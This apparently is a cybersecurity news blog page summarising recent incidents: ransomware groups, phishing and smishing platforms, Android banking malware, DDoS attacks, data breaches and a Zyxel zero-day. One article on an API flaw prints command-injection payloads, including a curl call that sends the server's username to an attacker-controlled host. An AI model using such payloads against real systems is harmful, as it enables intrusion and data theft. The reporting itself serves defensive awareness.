Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label News. Show all posts
trending news
Cyber Security News Trending trending news

“They're Just People—But Dangerous Ones”: Trellix's John Fokker Unpacks the Blurred Battlefield of Cybercrime at RSA 2025

 

At the RSA Conference 2025, John Fokker, head of threat intelligence at the Trellix Advanced Research Center, issued a stark reminder to the cybersecurity community that the behind of every cyberattack is a human being and the boundaries between criminals and nation-states are rapidly dissolving. Drawing from his experience as a former officer in the Dutch high-tech crime unit, Fokker urged cybersecurity professionals to stop viewing threats as faceless or purely technical. “Cybercriminals are not abstract concepts,” he said. “They’re individuals—ordinary people who happen to be doing bad things behind a keyboard.” 

His keynote speech stressed the importance of not overlooking basic vulnerabilities in the rush to guard against sophisticated attacks. “Attackers still go for the low-hanging fruit—weak passwords, missing patches, and lack of multi-factor authentication,” he noted. A central theme of his address was the convergence of criminal networks and state-backed operations. “What once were clearly separated entities—financially motivated hackers and state actors...are now intertwined,” Fokker said. “Nation-states are increasingly using proxies or outright criminals to carry out espionage and disruption campaigns.” Fokker illustrated this through a case study involving the notorious Black Basta ransomware group. 

He referenced internal communications that surfaced in an investigation, revealing the group’s leader “Oleg" formerly known as “Tramp” in the Conti gang. Oleg was reportedly arrested upon arriving in Armenia from Moscow last year, but escaped custody just days later. According to leaked chats, he claimed Russian officials orchestrated his return using a so-called “green corridor,” allegedly coordinated by a senior government figure referred to as “number one.” While Fokker clarified that these claims remain unverified, he emphasized they are a troubling sign of potential collaboration between state entities and criminal gangs. 

Still, he reminded attendees that attackers are not infallible. He recounted a failed ransomware attack by Black Basta on a U.S. healthcare organization, where the group’s encryption tool malfunctioned. “They had to fall back on threatening to leak data when the original extortion method broke down,” Fokker explained, highlighting that even seasoned attackers are prone to critical errors.
Read more »
trending news
Cyber Security News trending news

Security Researcher Uncovers Critical RCE Flaw in API Due to Incomplete Input Validation

In a recent security evaluation, a researcher discovered a severe remote code execution (RCE) vulnerability caused by improper backend input validation and misplaced reliance on frontend filters. The vulnerability centered on a username field within a target web application. 

On the surface, this field appeared to be protected by a regular expression filter—/^[a-zA-Z0-9]{1,20}$/—which was designed to accept only alphanumeric usernames up to 20 characters long. However, this filtering was enforced exclusively on the frontend via JavaScript. While this setup may prevent casual misuse through the user interface, it offered no protection once the client-side constraints were bypassed. 

The server did not replicate or enforce these restrictions, creating an opportunity for attackers to supply crafted payloads directly to the backend. Client-Side Regex: A False Sense of Security The researcher quickly identified a dangerous assumption built into the application’s architecture: that client-side validation would be sufficient to sanitize input. This approach led the backend to trust incoming data without question. 

By circumventing the web interface and manually crafting HTTP requests, the researcher was able to supply malicious input that would have been blocked by the frontend regex. This demonstrated a critical weakness in security design. The researcher noted that regular expressions should be viewed as tools to assist in user input formatting, not as security mechanisms. 

When frontend validation is treated as a safeguard rather than a convenience, it opens the door to serious vulnerabilities. Bypassing Protections via Alternate HTTP Methods The most significant discovery came when the researcher explored alternate HTTP methods. While the application interface relied on POST requests—where regex filters were enforced—the backend also accepted PUT requests at the same endpoint. These PUT requests were not subjected to any validation, creating a dangerous inconsistency. 

Using a crafted PUT request with the payload username=;id;, the researcher confirmed the ability to inject and execute arbitrary commands. The server’s response to the id command verified the successful exploitation of this oversight. Further probing revealed the potential for more advanced attacks, including out-of-band (OOB) data exfiltration. 

By submitting a payload like username=;curl http://attacker-controlled.com/$(whoami);, the researcher caused the server to initiate a connection to an external domain. This revealed the active user account running on the server, proving that the command had been executed remotely. The absence of a web application firewall (WAF) allowed this traffic to pass unnoticed, making the attack both silent and effective.  
Architectural Oversight and Security Best Practices This case highlighted a widespread architectural flaw: the fragmentation of security logic between frontend and backend layers. Developers frequently assume that if an input field is restricted on the client side, it is secure—overlooking the need to apply the same or stricter rules on the server. This disconnect is what enabled the exploit. 

The API processed data without verifying whether it adhered to expected formats, and alternative HTTP methods were insufficiently monitored or restricted. To address such risks, experts stress the importance of server-side validation as the primary line of defense. Every piece of input data should be rigorously checked against an allowlist of acceptable values before processing. 

Additionally, output should be sanitized to ensure that even if unsafe input slips through, it cannot be used maliciously. Logging and monitoring are also critical, especially for API endpoints that might be vulnerable to tampering. The deployment of a robust WAF could have detected and blocked these unusual request patterns, such as command injection or OOB callbacks, thereby mitigating the threat before damage occurred.
Read more »
News
Bitdefender cyber attack cyberattacks trending news News

Bitdefender Warns of Surge in Subscription Scams Disguised as Online Stores and Mystery Boxes

 

Cybersecurity researchers at Bitdefender have uncovered a sharp increase in deceptive online subscription scams, with fraudsters disguising themselves as legitimate e-commerce platforms and mystery box vendors. These sophisticated schemes are luring unsuspecting users into handing over sensitive credit card details under the guise of low-cost purchases. 

Unlike older, more obvious fraud attempts, this new wave of scams involves meticulously crafted fake websites that mimic real online shops. Bitdefender’s investigation revealed over 200 fraudulent sites offering goods such as footwear, apparel, and electronic gadgets. 

The catch? Victims unknowingly agree to recurring subscription charges cleverly hidden in the fine print. One tactic gaining traction is the so-called “mystery box” scam. These scams entice consumers with a small upfront fee in exchange for a surprise package, often marketed as unclaimed luggage or packages left behind at airports or post offices. 
However, the real goal is to harvest personal and payment information, often enrolling victims in recurring payment plans before the transaction is even finalized. The scams are widely advertised on social media platforms, including Facebook, through sponsored posts. 

In many cases, scammers pose as content creators or use fake influencer pages to build trust. Bitdefender researchers found more than 140 websites pushing these scams, with many traced back to a recurring address in Limassol, Cyprus—an address also linked to entities named in the Paradise Papers by the ICIJ Offshore Leaks Database. 

Some websites go further, advertising discounted “member prices” that require account top-ups, like a charge of €44 every two weeks, often concealed in promotional offers. These scams frequently promote multiple membership levels, using store credits and promises of steep discounts to mask overpriced or outdated products. 

Bitdefender warns that the evolving nature of these scams—complete with high-quality websites, paid advertising, and fake brand endorsements—makes them harder to detect. With the profitability of subscription fraud rising, scammers are scaling their operations, expanding beyond mystery boxes into bogus product sales and investment offers. 

Researchers caution users to stay vigilant while shopping online, especially when prompted to enter payment information for deals that seem too good to be true. As these tactics grow more elaborate, consumers are urged to read the fine print and verify the authenticity of online shops before completing any transactions.
Read more »
News
Anti-DDoS Measures cyber attack DDOS Attack News

Massive 1Tbps DDoS Attack Cripples Online Betting Site, Exposes Industry’s Ongoing Cybersecurity Failures

 

An online betting company has been knocked offline by a colossal 1-terabit-per-second Distributed Denial of Service (DDoS) attack, exposing glaring weaknesses in the digital defences of the gambling industry. Reported by TechRadar, the attack unleashed a massive flood of junk traffic that overwhelmed the site’s infrastructure, rendering its services inaccessible for hours. 

What makes the incident more concerning is the lack of sophistication behind it—this wasn’t a complex, stealthy operation but rather a brute-force flood that succeeded purely through scale. Despite the growing prevalence of such attacks in recent years, many companies in high-risk sectors like online gambling continue to treat cybersecurity as an afterthought. 

With their operations heavily reliant on constant uptime and revenue tied to every second online, gambling platforms remain prime targets for attackers, yet many fail to invest in fundamental protections like cloud-based DDoS mitigation, real-time monitoring, and incident response planning. 

Cybersecurity experts are baffled by this ongoing negligence, especially when previous headline-grabbing attacks—such as the 1.3Tbps assault on GitHub in 2018 or AWS’s 2.3Tbps encounter in 2020—should have prompted serious change. 
Compounding the issue is the role of Internet Service Providers (ISPs), who continue to shy away from proactive upstream filtering, allowing these massive data floods to reach their targets unchecked. The financial impact of such downtime is severe, with potential losses not only in revenue but also in user trust, legal exposure, and long-term brand damage. 

Security professionals stress that effective DDoS defence requires more than just faith in hosting providers; it demands deliberate investment in scalable protection tools like AWS Shield, Cloudflare, or Akamai, along with robust infrastructure redundancy and tested incident response strategies. 

In 2025, DDoS attacks are no longer anomalies—they’re a constant threat woven into the fabric of the internet. Ignoring them is not cost-saving; it’s gambling with disaster.
Read more »
trending news
DragonForce Ransomware Group malware News Ransomware trending news

DragonForce Unveils Cartel-Style Ransomware Model to Attract Affiliates

The ransomware landscape is seeing a shift as DragonForce, a known threat actor, introduces a new business model designed to bring various ransomware groups under a single, cartel-like umbrella. This initiative is aimed at simplifying operations for affiliates while expanding DragonForce’s reach in the cybercrime ecosystem. 

Traditionally, ransomware-as-a-service (RaaS) operations involve developers supplying the malicious tools and infrastructure, while affiliates carry out attacks and manage ransom negotiations. In exchange, developers typically receive up to 30% of the ransom collected. DragonForce’s updated model deviates from this approach by functioning more like a platform-as-a-service, offering its tools and infrastructure for a smaller cut—just 20%. 

Under this new setup, affiliates are allowed to create and operate under their own ransomware brand, all while utilizing DragonForce’s backend systems. These include data storage for exfiltrated files, tools for ransom negotiations, and malware deployment systems. This white-label model allows groups to appear as independent operations while relying on DragonForce’s infrastructure. 

A spokesperson for DragonForce told BleepingComputer that the group operates with clear rules and standards, which all affiliates are expected to follow. Any violations, they say, result in immediate removal from the network. Though these rules aren’t publicly disclosed, the group claims to maintain control since all services run on its servers. 

Interestingly, DragonForce claims it avoids certain targets in the healthcare sector, specifically facilities treating cancer and heart conditions. The group insists its motives are purely financial and not intended to harm vulnerable individuals. Cybersecurity analysts at Secureworks have noted that this new structure could appeal to both inexperienced and seasoned attackers. 

The simplified access to powerful ransomware tools, without the burden of managing infrastructure, lowers the barrier to entry and could lead to a broader adoption among cybercriminals. DragonForce has indicated its platform is open to unlimited affiliate brands capable of targeting a range of systems, including ESXi, NAS, BSD, and Windows environments. 

While the number of affiliates joining the network remains undisclosed, the group claims to have received interest from several prominent ransomware outfits. One such group, RansomBay, is already reported to be participating in the model. As this cartel-style operation gains traction, it could signal a new phase in ransomware operations—where brand diversity masks a centralised, shared infrastructure designed for profit and scalability.
Read more »
trending news
AI Artificial Intelligence Cyber Security mobile fraud News Payment Fraud trending news

Payment Fraud on the Rise: How Businesses Are Fighting Back with AI

The threat of payment fraud is growing rapidly, fueled by the widespread use of digital transactions and evolving cyber tactics. At its core, payment fraud refers to the unauthorized use of someone’s financial information to make illicit transactions. Criminals are increasingly leveraging hardware tools like skimmers and keystroke loggers, as well as malware, to extract sensitive data during legitimate transactions. 

As a result, companies are under mounting pressure to adopt more advanced fraud prevention systems. Credit and debit card fraud continue to dominate fraud cases globally. A recent report by Nilson found that global losses due to payment card fraud reached $33.83 billion in 2023, with nearly half of these losses affecting U.S. cardholders. 

While chip-enabled cards have reduced in-person fraud, online or card-not-present (CNP) fraud has surged. Debit card fraud often results in immediate financial damage to the victim, given its direct link to bank accounts. Meanwhile, mobile payments are vulnerable to tactics like SIM swapping and mobile malware, allowing attackers to hijack user accounts. 

Other methods include wire fraud, identity theft, chargeback fraud, and even check fraud—which, despite a decline in paper check usage, remains a threat through forged or altered checks. In one recent case, customers manipulated ATM systems to deposit fake checks and withdraw funds before detection, resulting in substantial bank losses. Additionally, criminals have turned to synthetic identity creation and AI-generated impersonations to carry out sophisticated schemes.  

However, artificial intelligence is not just a tool for fraudsters—it’s also a powerful ally for defense. Financial institutions are integrating AI into their fraud detection systems. Platforms like Visa Advanced Authorization and Mastercard Decision Intelligence use real-time analytics and machine learning to assess transaction risk and flag suspicious behavior. 

AI-driven firms such as Signifyd and Riskified help businesses prevent fraud by analyzing user behavior, transaction patterns, and device data. The consequences of payment fraud extend beyond financial loss. Businesses also suffer reputational harm, resource strain, and operational disruptions. 

With nearly 60% of companies reporting fraud-related losses exceeding $5 million in 2024, preventive action is crucial. From employee training and risk assessments to AI-powered tools and multi-layered security, organizations are now investing in proactive strategies to protect themselves and their customers from the rising tide of digital fraud.
Read more »
Smishing attack
cyber attack Data Theft News Smishing attack

Smishing Surge Expected in 2025 Driven by Sophisticated Phishing-as-a-Service Platform

Security researchers are sounding the alarm on a looming global wave of smishing attacks, warning that a powerful phishing-as-a-service (PhaaS) platform named Lucid—run by Chinese-speaking threat actors—is enabling cybercriminals to scale operations across 88 countries. 

According to threat intelligence firm Catalyst, Lucid has evolved from local-level operations into a globally disruptive tool, with a sharp increase in activity anticipated by early 2025. The platform allows attackers to send malicious links via Apple iMessage and Android’s Rich Communication Services, bypassing traditional telecom network filters. It also features a credit card validator, helping criminals confirm stolen financial information in real time. 

Lucid’s architecture offers an automated, subscription-based model that supports customizable phishing campaigns, leveraging anti-detection strategies like IP blocking, user-agent filtering, and time-limited URLs to avoid scrutiny. Threat actors using Lucid are increasingly impersonating trusted entities—such as government agencies, postal services, and toll collection services—to deceive victims and steal sensitive data. 

The U.S. has been hit particularly hard, with smishing scams prompting alerts from the FBI, FTC, state governments, and attorneys general. What sets Lucid apart is its efficiency and scale: researchers say it can send over 100,000 phishing messages per day. Its structure includes roles ranging from administrators to guest users, with weekly licensing options and automatic suspensions for non-renewal. 

These campaigns are notably effective, with a reported success rate of 5%. By operating over the internet and using device fingerprinting and geo-targeted phishing pages, Lucid boosts its reach while staying under the radar. 

It sources phone numbers through data breaches, OSINT, and darknet markets, making it one of the most sophisticated PhaaS platforms today—alongside others like Darcula and Lighthouse. As cybercriminals continue to embrace this plug-and-play model, experts fear smishing will become an even more pervasive threat in the months ahead.
Read more »
Trojan
Android Banking Trojan malware Malware Attack News Trojan

New Android Banking Trojan 'Crocodilus' Emerges as Sophisticated Threat in Spain and Turkey

 

A newly identified Android banking malware named Crocodilus is making waves in the cybersecurity world, with experts warning about its advanced capabilities and targeted attacks in Spain and Turkey. Discovered by Dutch mobile security firm ThreatFabric, the malware represents a major leap in sophistication, emerging not as a prototype but as a fully-developed threat capable of device takeover, remote control, and stealth data harvesting through accessibility services. 

Unlike many early-stage banking trojans, Crocodilus comes armed with a broad range of functionalities from its inception. Masquerading as Google Chrome via a misleading package name ("quizzical.washbowl.calamity"), the malware bypasses Android 13+ restrictions and initiates its attack by requesting accessibility permissions. Once granted, it connects to a command-and-control (C2) server to receive a list of targeted financial applications and corresponding HTML overlays to steal login credentials. 

The malware also targets cryptocurrency users with a unique social engineering strategy. Instead of spoofing wallet login pages, it pushes alarming messages urging users to back up their seed phrases within 12 hours or risk losing access. This manipulative tactic prompts victims to expose their seed phrases, which are then harvested via accessibility logging—giving attackers full access to the wallets. 

Crocodilus operates continuously in the background, monitoring app launches, capturing screen elements, and even intercepting one-time passwords from apps like Google Authenticator. It conceals its malicious activity by muting sounds and deploying a black screen overlay to keep users unaware. Key features include launching apps, removing itself from devices, sending SMS messages, retrieving contacts, requesting device admin rights, enabling keylogging, and modifying SMS management privileges. The malware’s ability to dynamically update C2 server settings further enhances its adaptability. 

ThreatFabric notes that the malware’s sophistication, especially in its initial version, suggests a seasoned developer behind its creation—likely Turkish-speaking, based on code analysis. The emergence of Crocodilus underscores the evolving threat landscape of mobile banking malware, where adversaries are deploying complex and evasive techniques earlier in development cycles. In a related development, Forcepoint reported a separate phishing campaign using tax-themed emails to spread the Grandoreiro banking trojan in Latin America and Spain, indicating a broader uptick in banking malware activity across platforms and regions.
Read more »
trending news
Africa under cyber threats bfsi BFSI cyber security Cyber Security News trending news

Cyber Threats Surge Across Africa’s Financial Sector, Urging Stronger Cybersecurity Defenses

 

In 2024, the financial landscape in Africa has been rocked by a series of high-impact cyberattacks, underscoring the urgent need for enhanced digital defenses across the Banking, Financial Services, and Insurance (BFSI) sector. From Uganda to Zimbabwe and South Africa, institutions are increasingly in the crosshairs of sophisticated cybercriminal groups. One of the most alarming incidents involved the Bank of Uganda, which reportedly lost approximately $16.8 million to an offshore hacking group known as “Waste.” 

In a similar breach of security, ZB Financial Holdings in Zimbabwe suffered a ransomware attack in July that led to substantial data exposure, compromising both customer details and operational systems. South Africa’s Standard Bank also confirmed a recent data breach that affected limited personal and financial data, highlighting how widespread and varied these threats have become. Interpol’s 2024 African Cyberthreat Assessment paints a grim picture—cyberattacks on African businesses surged by 23% in 2023, with ransomware and data breaches being the most prevalent. 

These figures reflect not only a rising frequency but also the growing sophistication of cybercrime on the continent. The IBM 2024 Cost of a Data Breach report further reveals that the average cost of a data breach in South Africa has risen sharply to R53.1 million, a significant jump from R49.45 million the previous year. Historical incidents continue to serve as cautionary tales. The 2020 Experian breach compromised 24 million personal records, while the 2023 Medusa ransomware attack on the Bank of Africa’s Malian unit resulted in the leak of 2TB of sensitive data. 

These events demonstrate the severe financial and reputational risks African financial institutions face. As the sector increasingly adopts technologies such as artificial intelligence, blockchain, and cloud computing, new avenues for cyber exploitation have emerged. Threats like phishing schemes, insider sabotage, and regulatory compliance issues now loom larger than ever before. “Cybercrime is evolving at an alarming rate, and financial institutions in Africa are prime targets,” said Abe Wakama, CEO of IT News Africa. 

“The BFSI Security Summit will offer a vital platform for industry leaders to collaborate, exchange knowledge, and deploy effective strategies to protect their institutions,” he further added. 

Cybersecurity experts and Chief Information Security Officers (CISOs) across the continent are responding by urging a multi-layered approach to digital defense—deploying AI-powered threat detection systems, implementing zero trust security models, and ensuring compliance with key data privacy regulations like South Africa’s Protection of Personal Information Act (POPIA) and the EU’s GDPR. Additional measures such as continuous monitoring, advanced endpoint protection, and robust incident response planning are becoming standard practice. Equally critical are human factors—regular employee training and rigorous penetration testing play a pivotal role in building organizational cyber resilience.
Read more »
Phishing Attacks
Cyber Attacks cyberattacks trending news Netflix cybersecurity News phishing Phishing Attacks

Netflix Users Warned About AI-Powered Phishing Scam

 

Netflix subscribers are being warned about a sophisticated phishing scam circulating via email, designed to steal personal and financial information. 

The deceptive email mimics an official Netflix communication, falsely claiming that the recipient’s account has been put on hold. It urges users to click a link to resolve the issue, which redirects them to a fraudulent login page that closely resembles Netflix’s official site. 

Unsuspecting users are then prompted to enter sensitive details, including their Netflix credentials, home address, and payment information. Cybersecurity experts caution that phishing scams have become more advanced with the rise of AI-driven tactics. 

According to Jake Moore, Global Cybersecurity Advisor at ESET, artificial intelligence has enabled cybercriminals to launch phishing campaigns at an unprecedented scale, making them appear more legitimate while targeting a larger number of users. 

“Despite these advancements, many scams still rely on urgency to pressure recipients into acting quickly without verifying the sender’s authenticity,” Moore explained. 

Users are advised to remain vigilant, double-check email sources, and avoid clicking on suspicious links. Instead, they should visit Netflix directly through its official website or app to verify any account-related issues.
Read more »
Ransomware
cyberattacks trending news Cybersecurity Attack malware News Ransomware

Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations

Cisco Talos has uncovered a series of cyber espionage campaigns attributed to the advanced persistent threat (APT) group Lotus Blossom, also known as Spring Dragon, Billbug, and Thrip. 

The group has been active since at least 2012, targeting government, manufacturing, telecommunications, and media sectors in regions such as the Philippines, Vietnam, Hong Kong, and Taiwan. Talos identified Sagerunex, a backdoor tool used exclusively by Lotus Blossom, as the core malware in these campaigns. 

The investigation revealed multiple variants of Sagerunex, evolving from its original form to leverage third-party cloud services such as Dropbox, Twitter, and Zimbra webmail as command-and-control (C2) tunnels, instead of traditional Virtual Private Servers (VPS). This shift helps the group evade detection while maintaining control over infected endpoints. 

The group has been observed gaining persistence on compromised systems by embedding Sagerunex into the system registry and configuring it to run as a service. The malware operates as a dynamic link library (DLL), executed directly in memory to avoid detection. The campaigns also showcase long-term persistence strategies, allowing attackers to remain undetected for months. 

Beyond Sagerunex, Lotus Blossom employs an arsenal of hacking tools to facilitate credential theft, privilege escalation, and data exfiltration. These include a Chrome cookie stealer from GitHub, a customized Venom proxy tool, a privilege adjustment tool, and an archiving tool for encrypting and stealing data. 

Additionally, the group utilizes mtrain V1.01, a modified HTran proxy relay tool, to route connections between compromised machines and external networks. The attack chain follows a structured multi-stage approach, starting with reconnaissance commands such as “net,” “tasklist,” “ipconfig,” and “netstat” to gather system details. 

If an infected machine lacks direct internet access, the attackers leverage proxy settings or the Venom tool to establish connectivity. A notable tactic involves storing malicious tools in the “public\pictures” subfolder, a non-restricted directory, to avoid detection.

Talos’ research underscores the growing sophistication of Lotus Blossom, which continues to refine its techniques and expand its capabilities. With high confidence, Cisco attributes these campaigns to Lotus Blossom, highlighting its sustained cyber espionage operations against high-value targets.
Read more »
News
Cyber Security Cyber Threats Cybersecurity Attack financial attack News

Lending App Data Breach Leaves Sensitive Customer Information Unprotected

 

A major digital lending platform has reportedly exposed sensitive customer data due to a misconfigured Amazon AWS S3 bucket that was left unsecured without authentication. Security researchers discovered the breach on November 28, 2024, but the issue remained unresolved until January 16, 2025, leaving the data vulnerable for over a month. While there is no direct evidence that cybercriminals accessed the information, experts warn that only a thorough forensic audit could confirm whether any unauthorized activity took place.  

The exposed data reportedly includes Know Your Customer (KYC) documents, which financial institutions use to verify identity, address, and income details. This type of information is particularly valuable to cybercriminals, as it can be exploited to fraudulently obtain loans, orchestrate identity theft, or carry out sophisticated social engineering attacks. 

According to researchers, attackers could leverage leaked loan agreements or bank details to manipulate victims into making unauthorized payments or providing further account verification. Furthermore, such personal data often ends up being aggregated and sold on the dark web, amplifying risks for affected individuals and making it harder to protect their privacy. 

To minimize the risks associated with such breaches, experts recommend monitoring bank statements and transaction histories for any suspicious activity and immediately reporting irregularities to financial institutions. Users are also advised to set strong, unique passwords for different accounts, especially those containing financial or sensitive information, and to update them immediately if a breach is suspected. Enabling multi-factor authentication (MFA) adds an extra layer of security and can significantly reduce the likelihood of unauthorized access. 

Another major concern following such incidents is the increased likelihood of social engineering attacks like phishing, where criminals use leaked data to craft convincing fraudulent messages. Attackers may impersonate banks, service providers, or even personal contacts to trick victims into revealing sensitive details, clicking malicious links, or scanning fraudulent QR codes. 

Users should remain cautious of unexpected emails or messages, verify the sender’s identity before clicking any links, and contact companies directly through their official websites. It is crucial to remember that banks and legitimate financial institutions will never request sensitive account details via phone or email or ask customers to transfer funds to another account.
Read more »
trending news
Cybersecurity Attack malware News online threats trending news

Beware of Fake Viral Video Links Spreading Malware

 

McAfee Labs has uncovered a rise in cyber scams where fraudsters use fake viral video links to trick people into downloading malware. These attacks rely on social engineering, enticing users with promises of exclusive or leaked content. 

Once a user clicks on the deceptive link, they are redirected through several malicious websites before unknowingly downloading a harmful file. The scheme typically begins with a fake message or document containing a link to a trending video. Clicking the link leads to an unsafe website filled with misleading advertisements, fake download buttons, and sometimes adult content. 

These sites trick users into downloading a file—often a ZIP folder—that seems harmless but actually contains malware hidden within a password-protected archive. Once downloaded and extracted, the file reveals a setup program that, when executed, launches the malware. To make it appear legitimate, a CAPTCHA screen is displayed first. 

However, once the user clicks “OK,” the malware installs itself discreetly, injecting harmful files into the system and running hidden processes that steal data or compromise the device. While McAfee’s security measures have intercepted many such attacks, experts warn that these scams continue to evolve. 

Cybercriminals use clickbait tactics to manipulate people’s curiosity, making it crucial to stay vigilant. To protect yourself, avoid clicking on links that claim to provide exclusive or leaked videos, as these are often traps designed to distribute malware. 

Be cautious of unfamiliar websites that prompt you to download files, as they may contain hidden threats. Always scan downloaded files with reliable security software before opening them. Additionally, keep your antivirus software updated to ensure real-time protection against emerging cyber threats. Since online scams are constantly evolving, staying informed and cautious is the best defense against potential cyber risks.
Read more »
News
Chinese Hackers cyber attack Cyber-Espionage cyberattacks trending news cybersecurity news News

Chinese Hackers Exploit SSH Daemon to Maintain Persistent Access in Cyber-Espionage Operations

 

A sophisticated cyber-espionage campaign attributed to the Chinese hacking group Evasive Panda, also known as DaggerFly, has been uncovered, targeting network appliances through a newly identified attack suite. According to cybersecurity researchers at Fortinet’s FortiGuard Labs, the attackers are leveraging a malicious toolkit named ELF/Sshdinjector.A!tr, injecting malware into the SSH daemon (SSHD) to establish long-term access and execute covert operations. 

Active since at least mid-November 2024, this attack method enables unauthorized control over compromised systems. While the initial entry point remains unclear, once infiltrated, a dropper module determines whether the device is already infected and assesses its privilege level. If running under root permissions, the malware deploys multiple binaries, including libssdh.so, which serves as the primary backdoor responsible for command-and-control (C2) communication and data exfiltration. 

Additional components such as “mainpasteheader” and “selfrecoverheader” are used to maintain persistence. The injected SSH library covertly monitors and executes commands received from a remote C2 server, allowing the attackers to conduct system reconnaissance, steal credentials, manipulate files, and execute arbitrary commands. 

The malware supports fifteen different functions, ranging from collecting system details and listing active processes to reading sensitive user data and gaining remote shell access. It can also upload and download files, delete specific records, rename files, and notify the attacker when the malware is active. 

Despite previous detections of similar threats, FortiGuard’s research is the first to provide a detailed analysis of how ELF/Sshdinjector.A!tr operates. The group behind this attack, Evasive Panda, has been active since 2012 and has previously conducted cyber-espionage campaigns, including supply chain attacks via ISPs in Asia and targeted intelligence collection from U.S. organizations. 

The group was also recently linked to deploying a novel macOS backdoor. Notably, Fortinet researchers leveraged AI-assisted tools to aid in the malware’s reverse engineering process. While challenges such as hallucinations, extrapolation errors, and omissions were encountered, the experiment demonstrated AI’s growing potential in cybersecurity research. 

Fortinet assures that its customers are already protected against this threat through its FortiGuard AntiVirus service, which detects the malware as ELF/Sshdinjector.A!tr and Linux/Agent.ACQ!tr. The company has also provided hashes of identified samples on VirusTotal for further investigation by the security community.
Read more »
News
Cyber Threats Cybersecurity Indian Government website News

Kaveri 2.0 Portal Hit by Massive DDoS Attack

 

Property registrations and citizen services in Karnataka have been severely affected since Monday due to a large-scale cyberattack on the Kaveri 2.0 portal. Initially suspected to be a technical glitch, the Revenue and E-Governance Departments have now confirmed that the disruptions are the result of a “motivated Distributed Denial of Service (DDoS) attack.” 

The Kaveri 2.0 portal, introduced in 2023 to streamline property registration and related services, has been facing issues since January 13, 2025, with attackers consistently exploiting vulnerabilities despite repeated fixes. Revenue Minister Krishna Byre Gowda stated that the evolving nature of these disruptions indicates a deliberate and sustained attempt to cripple the system. 

Officials revealed that bots are being used to conduct excessive searches for encumbrance certificates (ECs) through customer logins, overloading the system and causing it to crash. Even as authorities address certain weaknesses, attackers appear to be adapting in real-time to exploit new loopholes. 

For instance, on Monday, the system was restored by 1 p.m. after a complete outage, but it was down again by 3 p.m. The attack has had a severe impact on property registrations across the state, with daily registrations plummeting from an average of over 8,000 to just over 500 on Tuesday. 

Thousands of property transactions have been postponed indefinitely due to the disruption, leaving buyers and sellers in a state of uncertainty. Many users have been unable to log into the portal or upload necessary documents, causing widespread frustration. 

K.V. Govardhan of Arna Estates, who had registrations scheduled in Bagepalli and Banaswadi on Monday, expressed concerns over the lack of clarity on when the system would be fully restored. 
Read more »
Security threats
cyber attack Cyber Attacks Globe Life News Security threats

Globe Life Data Breach Affects 850,000 Customers, Investigation Reveals

Insurance provider Globe Life has revealed that a data breach from June 2024 was far more extensive than initially believed. While early reports in October 2024 suggested that around 5,000 customers were impacted, the company’s latest investigation indicates that approximately 850,000 policyholders may have had their personal data compromised. 

The breach was initially detected in a subsidiary, American Income Life Insurance Company. At the time, Globe Life reported a limited impact but acknowledged the possibility of more affected individuals. 

Further findings now confirm that an unidentified cybercriminal gained access to databases maintained by independent agency owners, exposing a wide range of sensitive customer information. Stolen data includes full names, Social Security numbers, phone numbers, email addresses, home addresses, birth dates, health records, and insurance policy details. 

In response, Globe Life took immediate action to secure its systems, restricting external access to the compromised portal. According to its SEC filing, the company was targeted by an extortion attempt but chose not to meet the ransom demands. The insurer maintains that its primary IT infrastructure and data encryption systems remained intact despite the breach. 

As a precaution, Globe Life is offering credit monitoring services to potentially affected customers. However, cybersecurity experts recommend that policyholders take extra steps to protect themselves, including signing up for identity theft protection, keeping a close watch on financial statements, and being alert to phishing attempts. Cybercriminals frequently use stolen data to create deceptive emails and messages aimed at obtaining further personal or financial information. 

Customers are advised to be cautious when receiving unexpected communications via email, text, or social media. Any unsolicited messages containing links or attachments should be avoided. Installing reliable antivirus software on personal devices can also help protect against malware that may be embedded in phishing attempts. 

Despite the scale of the breach, Globe Life has stated that it does not expect any disruptions to its business operations. However, customers should update their passwords and remain vigilant against potential fraud in the coming months.
Read more »
Ransomware attack
Attack on NYBC cyber attack Cyber Attacks News NYBC Ransomware attack

Ransomware Attack Disrupts New York Blood Center Operations Amid Critical Shortage

 

The New York Blood Center (NYBC), a major provider of blood products and transfusion services in the U.S., suffered a ransomware attack on Sunday, leading to operational disruptions and the cancellation of some donor appointments. 

The cyberattack comes at a time when the center is already struggling with a significant drop in blood donations, further straining supply levels. 

NYBC, which collects approximately 4,000 units of blood daily and supports over 500 hospitals across multiple states, detected the security breach over the weekend of January 26. 
After noticing unusual activity within its IT systems, the organization swiftly enlisted cybersecurity experts to investigate. Their findings confirmed that ransomware was responsible for the disruption. 

In response, NYBC took immediate measures to contain the attack, including temporarily shutting down certain systems while working toward a secure restoration. Despite the ongoing challenges, the organization continues to accept blood donations but warned that some appointments may need to be rescheduled. 

The attack comes just days after NYBC issued a blood emergency following a dramatic 30% decline in donations, resulting in 6,500 fewer units collected and severely impacting regional blood supplies. At this time, it remains unclear whether the attackers accessed or stole sensitive donor information. No ransomware group has claimed responsibility yet.

As NYBC works to restore its systems, it is urging donors to continue making appointments to help address the ongoing blood shortage and ensure hospitals receive the critical supplies they need.
Read more »
Zyxel
cyber attack Cyber Attacks News trending news Zero day vul Zyxel

Critical Zero-Day Vulnerability in Zyxel Devices Sparks Widespread Exploitation


Cybersecurity researchers at GreyNoise have uncovered widespread exploitation of a critical zero-day vulnerability in Zyxel CPE Series devices, months after it was initially reported to the manufacturer. The flaw, identified as CVE-2024-40891, allows attackers to execute arbitrary commands on affected devices, potentially leading to data breaches, network infiltration, and complete system compromise. GreyNoise has disclosed the issue to raise awareness among organizations and individuals at risk, as mass exploitation attempts have already been observed.

Details of the Vulnerability and Exploitation

The vulnerability, CVE-2024-40891, was first reported to Zyxel by researchers at VulnCheck in August 2024. However, Zyxel has yet to release a public advisory or an official CVE entry for the flaw, leaving users without a patch to mitigate the risk. GreyNoise collaborated with VulnCheck to disclose the issue, following standard security policies. A GreyNoise spokesperson stated, “Due to first-hand, confirmed mass exploitation attempts for this vulnerability, we chose to disclose this to raise awareness among those who may be impacted.”

Security analysts at Censys estimate that approximately 1,500 devices are online and potentially vulnerable, though definitive confirmation of affected versions is still pending. The National Vulnerability Database (NVD) has not yet provided additional details about the issue. To assess the extent of malicious activity, GreyNoise and VulnCheck conducted a joint investigation, revealing that attackers are actively targeting the flaw.

